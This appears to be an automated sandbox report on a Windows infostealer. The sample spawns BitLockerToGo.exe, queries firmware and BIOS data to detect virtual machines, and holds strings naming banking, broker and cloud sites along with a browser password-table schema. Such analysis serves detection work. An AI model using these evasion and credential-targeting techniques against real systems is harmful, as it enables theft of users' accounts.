Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00408DA0	2_2_00408DA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00426F82	2_2_00426F82
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00434F80	2_2_00434F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00441F80	2_2_00441F80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00409F9C	2_2_00409F9C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00404FA0	2_2_00404FA0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00409FA8	2_2_00409FA8

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0041C2A0 appears 176 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0040C8C0 appears 70 times

Source: file.exe, 00000000.00000002.2424627621.0000000002580000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2425522416.000000000288C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/4@2/1

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00432088 CoCreateInstance,

2_2_00432088

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\jsii-runtime.1844169201

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BitLockerToGo.exe, 00000002.00000003.2448253669.00000000052E8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2471077240.00000000052EE000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2448574193.00000000052C9000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe

ReversingLabs: Detection: 23%

Source: file.exe	String found in binary or memory: &github.com/filecoin-project/go-address
Source: file.exe	String found in binary or memory: &github.com/filecoin-project/go-address&func(address.Address) (string, error)&func(string) (address.Address, error)
Source: file.exe	String found in binary or memory: kGetSecurityDescriptorDaclGetSecurityDescriptorSaclGetSidIdentifierAuthorityInitiateSystemShutdownExWIsValidSecurityDescriptorSetSecurityDescriptorDaclSetSecurityDescriptorSaclFindNextVolumeMountPointWFindVolumeMountPointCloseQueryInformationJobObjectNtQueryInformationProcessSetupDiCallClassInstallerSetupDiGetDevicePropertyWSetupDiGetSelectedDriverWSetupDiSetSelectedDriverWecdsa: invalid public keySliceType.Grow argument 1xml: end tag with no nameXML syntax error on line unexpected end element </invalid character entity illegal character code %UInvalid Prerelease stringSouth Africa Standard TimeSaint Pierre Standard TimeNewfoundland Standard TimeCentral Asia Standard TimeEkaterinburg Standard TimeE. Australia Standard TimeW. Australia Standard TimeBougainville Standard TimeLine Islands Standard TimeWest Pacific Standard Time: day-of-year out of rangereflect.Value.CanInterfaceobtainResourceDependenciesObtainResourceDependencieshexcolor\|rgb\|rgba\|hsl\|hsla^[-+]?[0-9]+(?:\.[0-9]+)?$GetFileInformationByHandleinvalid argument to Int63ninvalid argument to Int31ninvalid request descriptorno CSI structure availablerequired key not availableno message of desired typename not unique on networkCertFreeCertificateContextPostQueuedCompletionStatusfailed to find ConnectEx: binary.Read: invalid type DOS Header magic not foundWSAEnumNameSpaceProvidersAWSAEnumNameSpaceProvidersWSafeArrayDestroyDescriptorSafeArrayAllocDescriptorExBelarusian Belarus (be-BY)Bulgarian Bulgaria (bg-BG)English Caribbean (en-029)French Switzerland (fr-CH)Fulah Senegal (ff-Latn-SN)German Switzerland (de-CH)Kinyarwanda Rwanda (rw-RW)Latin Vatican City (la-VA)Pashto Afghanistan (ps-AF)Slovenian Slovenia (sl-SI)Sotho South Africa (st-ZA)Spanish Costa Rica (es-CR)Tajik (Cyrillic) (tg-Cyrl)Uzbek (Cyrillic) (uz-Cyrl)Venda South Africa (ve-ZA)Vietnamese Vietnam (vi-VN)Xhosa South Africa (xh-ZA)all goroutines stack tracenotewakeup - double wakeuppersistentalloc: size == 0/gc/cycles/total:gc-cyclesnegative idle mark workersuse of invalid sweepLockerruntime: bad span s.state=freedefer with d.fn != nilforEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memoryIDs must be less than 2^63 using unaddressable valueunknown ABI parameter kind using zero Value argumentreflect.Value.MethodByNamereflect.Value.OverflowUintdefaultAddDockerImageAssetaws-cdk-lib.CfnHookVersionaws-cdk-lib.CustomResourceaws-cdk-lib.IgnoreStrategyRETAIN_ON_UPDATE_OR_DELETEDefaultAddDockerImageAssetaws-cdk-lib.BundlingOutputaws-cdk-lib.CfnOutputPropsaws-cdk-lib.ILocalBundlingaws-cdk-lib.IPostProcessoraws-cdk-lib.ITokenResolveraws-cdk-lib.IntrinsicPropsaws-cdk-lib.ResolveOptionsaws-cdk-lib.ReverseOptionsconstructs.DependencyGroupconstructs.MetadataOptionsencountered a cycle via %stoo many colons in addressinvalid port %q after host145519
Source: file.exe	String found in binary or memory: unlock: lock countprogToPointerMask: overflow/gc/cycles/forced:gc-cycles/memory/classes/other:bytes/memory/classes/total:bytesfailed to set sweep barrierwork.nwait was > work.nproc not in stack roots range [allocated pages below zero?address not a stack addressmspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPreemptStack=runtime: thread ID overflowstopTheWorld: holding locksgcstopm: not waiting for gcinternal lockOSThread errorruntime: checkdead: nmidle=runtime: checkdead: find g runlock of unlocked rwmutexsigsend: inconsistent statemakeslice: len out of rangemakeslice: cap out of rangegrowslice: len out of rangestack size not a power of 2too many callback functionstimer when must be positive: unexpected return pc for could not decode varint: %wduplicate default import %snot enough bytes for cid v0input isn't valid multihashreflect.Value.OverflowFloatreflect.Value.UnsafePointer is not assignable to type aws-cdk-lib.ContextProvideraws-cdk-lib.TokenComparisonaws-cdk-lib.BundlingOptionsaws-cdk-lib.CfnCapabilitiesaws-cdk-lib.CfnMappingPropsaws-cdk-lib.CfnTrafficRouteaws-cdk-lib.CfnUpdatePolicyaws-cdk-lib.EncodingOptionsaws-cdk-lib.FileAssetSourceaws-cdk-lib.FileCopyOptionsaws-cdk-lib.INumberProduceraws-cdk-lib.IResolveContextaws-cdk-lib.IStringProducerafter object key:value pair363797880709171295166015625application/gzip-compressedapplication/x-7z-compressedapplication/x-installshieldapplication/pkcs7-signatureboringcrypto: not availableunsupported string type: %vx509: malformed certificatecurrent time %s is after %sber2der: input ber is emptyber2der: Invalid BER formatreflectlite.Value.Interfacereflectlite.Value.NumMethodabi.NewName: tag too long: !#$%&()*+-./:<=>?@[]^_{\|}~ unexpected negative nestingcan not decode float as intdo not know how to skip: %vinvalid escape char after \invalid callback object: %vassumeRoleAdditionalOptionsstackTemplateAssetObjectUrlAssumeRoleAdditionalOptionsStackTemplateAssetObjectUrlIPv6 field has value >=2^16expression nests too deeplyGetSecurityDescriptorLengthStartServiceCtrlDispatcherWFindCloseChangeNotificationGetUserPreferredUILanguagesSetupDiClassNameFromGuidExWSetupDiGetDeviceInstanceIdWSetupDiGetDriverInfoDetailWMapType.Indirect argument 1MapType.SetIndex argument 1MapType.SetIndex argument 2MapType.SetIndex argument 3MapType.GetIndex argument 1MapType.GetIndex argument 2SliceType.SetNil argument 1SliceType.Append argument 1SliceType.Append argument 2xml: start tag with no namexml: opening charset %q: %winvalid character <<%c>> %sinvalid P224 point encodinginvalid P256 point encodinginvalid P384 point encodinginvalid P521 point encodinginput overflows the modulusNAF digits must fit in int8unsupported map key type %qend of array (out of space)Canada Central Standard TimeCen. Australia Standard TimeAus Central W. Standard TimeCentral Europe Standard TimeEnglish name for time zone "^(?:(?:97(?:8\|9))[0-9]{10})$^(?i)[A-HJKMNP-TV-Z0-9]{26}$os: p
Source: file.exe	String found in binary or memory: unsafe.String: len out of rangefmt: unknown base; can't happenreflect: Len of non-array type reflect.MakeSlice: negative lenreflect.MakeSlice: negative capaws-cdk-lib.CfnDynamicReferenceaws-cdk-lib.PermissionsBoundaryaws-cdk-lib.CfnHookVersionPropsaws-cdk-lib.CustomResourcePropsaws-cdk-lib.GetContextKeyResultaws-cdk-lib.ICfnResourceOptionsaws-cdk-lib.IStableListProduceraws-cdk-lib.LazyAnyValueOptionsaws-cdk-lib.ResourceEnvironmentjson: invalid number literal %qin literal true (expecting 'r')in literal true (expecting 'u')in literal true (expecting 'e')in literal null (expecting 'u')in literal null (expecting 'l')expected colon after object key looking for beginning of value11368683772161602973937988281255684341886080801486968994140625application/x-windows-installermergeRuneSets odd length []runex509: malformed GeneralizedTimecrypto/ecdh: invalid public keyx509: invalid basic constraintsx509: malformed tbs certificatex509: malformed subjectUniqueIDx509: certificate is valid for pkcs7: unsupported algorithm %qreflect: NumIn of non-func typeRat.GobDecode: buffer too smallsquare root of negative operandselected encoding not supportedexpect ] in the end, but found can only unmarshal into pointerLOAD_BALANCER_LISTENER_PROVIDERzone must be a non-empty stringca-ES-valencia en-US-u-va-posixCertDuplicateCertificateContextSetupDiGetDeviceInfoListDetailWStructField.SetIndex argument 1StructField.SetIndex argument 2StructField.GetIndex argument 1non-pointer passed to Unmarshalnil pointer passed to Unmarshalunexpected EOF in CDATA sectionfunctions cannot be marshalled!map close at end of union value: day-of-year does not match daycrypto/aes: input not full blockresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyfail to seek to string table: %vfail to seek to symbol table: %vCOFF symbol offset out of boundsWSAGetServiceClassNameByClassIdAWSAGetServiceClassNameByClassIdW!"#$%&'()*+,-./:;<=>?@[\]^_`{\|}~Azerbaijani (Cyrillic) (az-Cyrl)Luxembourgish Luxembourg (lb-LU)sync: Unlock of unlocked RWMutexsync: negative WaitGroup counterslice bounds out of range [::%x]slice bounds out of range [:%x:]slice bounds out of range [%x::] (types from different packages)GCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedabcdefghijklmnopqrstuvwxyz234567cannot marshal undefined addressreused pkg n
Source: file.exe	String found in binary or memory: unsafe.String: len out of rangefmt: unknown base; can't happenreflect: Len of non-array type reflect.MakeSlice: negative lenreflect.MakeSlice: negative capaws-cdk-lib.CfnDynamicReferenceaws-cdk-lib.PermissionsBoundaryaws-cdk-lib.CfnHookVersionPropsaws-cdk-lib.CustomResourcePropsaws-cdk-lib.GetContextKeyResultaws-cdk-lib.ICfnResourceOptionsaws-cdk-lib.IStableListProduceraws-cdk-lib.LazyAnyValueOptionsaws-cdk-lib.ResourceEnvironmentjson: invalid number literal %qin literal true (expecting 'r')in literal true (expecting 'u')in literal true (expecting 'e')in literal null (expecting 'u')in literal null (expecting 'l')expected colon after object key looking for beginning of value11368683772161602973937988281255684341886080801486968994140625application/x-windows-installermergeRuneSets odd length []runex509: malformed GeneralizedTimecrypto/ecdh: invalid public keyx509: invalid basic constraintsx509: malformed tbs certificatex509: malformed subjectUniqueIDx509: certificate is valid for pkcs7: unsupported algorithm %qreflect: NumIn of non-func typeRat.GobDecode: buffer too smallsquare root of negative operandselected encoding not supportedexpect ] in the end, but found can only unmarshal into pointerLOAD_BALANCER_LISTENER_PROVIDERzone must be a non-empty stringca-ES-valencia en-US-u-va-posixCertDuplicateCertificateContextSetupDiGetDeviceInfoListDetailWStructField.SetIndex argument 1StructField.SetIndex argument 2StructField.GetIndex argument 1non-pointer passed to Unmarshalnil pointer passed to Unmarshalunexpected EOF in CDATA sectionfunctions cannot be marshalled!map close at end of union value: day-of-year does not match daycrypto/aes: input not full blockresource temporarily unavailablesoftware caused connection abortnumerical argument out of domainCertAddCertificateContextToStoreCertVerifyCertificateChainPolicyfail to seek to string table: %vfail to seek to symbol table: %vCOFF symbol offset out of boundsWSAGetServiceClassNameByClassIdAWSAGetServiceClassNameByClassIdW!"#$%&'()*+,-./:;<=>?@[\]^_`{\|}~Azerbaijani (Cyrillic) (az-Cyrl)Luxembourgish Luxembourg (lb-LU)sync: Unlock of unlocked RWMutexsync: negative WaitGroup counterslice bounds out of range [::%x]slice bounds out of range [:%x:]slice bounds out of range [%x::] (types from different packages)GCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevruntime: mcall function returnedruntime: newstack called from g=runtime: stack split at bad timepanic while printing panic valueruntime: setevent failed; errno=runtime.semasleep wait_abandonedabcdefghijklmnopqrstuvwxyz234567cannot marshal undefined addressreused pkg n
Source: file.exe	String found in binary or memory: depgithub.com/filecoin-project/go-addressv0.0.3h1:eVfbdjEbpbzIrbiSa+PiGUY+oDK9HnUn+M1R/ggoHf8=
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.init
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.func1
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Bytes
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.func2
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.0
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Protocol
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Payload
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.String
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Empty
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Unmarshal
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.Marshal
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalJSON
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalJSON
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Scan
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewIDAddress
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewActorAddress
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.addressHash
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.NewFromBytes
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.newAddress
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.encode
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Checksum
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.decode
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.ValidateChecksum
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.hash
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.Address.MarshalBinary
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalBinary
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalCBOR
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).UnmarshalCBOR
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.init.1
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Bytes
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Empty
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Marshal
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalBinary
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).MarshalJSON
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Payload
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Protocol
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).String
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address.(*Address).Unmarshal
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address@v0.0.3/address.go
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address@v0.0.3/address.go
Source: file.exe	String found in binary or memory: github.com/filecoin-project/go-address@v0.0.3/constants.go
Source: file.exe	String found in binary or memory: github.com/aws/jsii-runtime-go@v1.103.1/internal/kernel/load.go
Source: file.exe	String found in binary or memory: net/addrselect.go
Source: file.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 11810304 > 1048576

Source: file.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x40b600
Source: file.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x6cf400

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: section name: .symtab

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_0044AEB8 push ecx; ret

2_2_0044AEB9

Source: C:\Users\user\Desktop\file.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Query firmware table information (likely to detect VMs)

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 1132

Thread sleep time: -180000s >= -30000s

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: BitLockerToGo.exe, 00000002.00000003.2520674852.0000000005EC8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: yVmcI
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000002.00000002.2571470730.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2568341431.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2568341431.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2571470730.0000000002F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2424627621.00000000026F6000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: eVmcierFLXhOQsHCsMgLHHRMTurKAQfzfWnkiJsLdkfMTpbLGmLPcnGBqMCGrUhyfMHSVokdaopfgCNaPxjnuriwZbUqKzCqWNwsBxvrNbqNmoMUCWSHzAzVNPxKpsrEFrQHPAIzFDVktEWAZrKdGNgJwsdiUqOXNHuLLtilBifNosCTWdnwvb
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: BitLockerToGo.exe, 00000002.00000002.2571470730.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2568341431.0000000002FB6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~@
Source: BitLockerToGo.exe, 00000002.00000003.2471291268.0000000005317000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696487552p
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000002.2422893307.0000000001D67000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: BitLockerToGo.exe, 00000002.00000003.2471400737.0000000005309000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
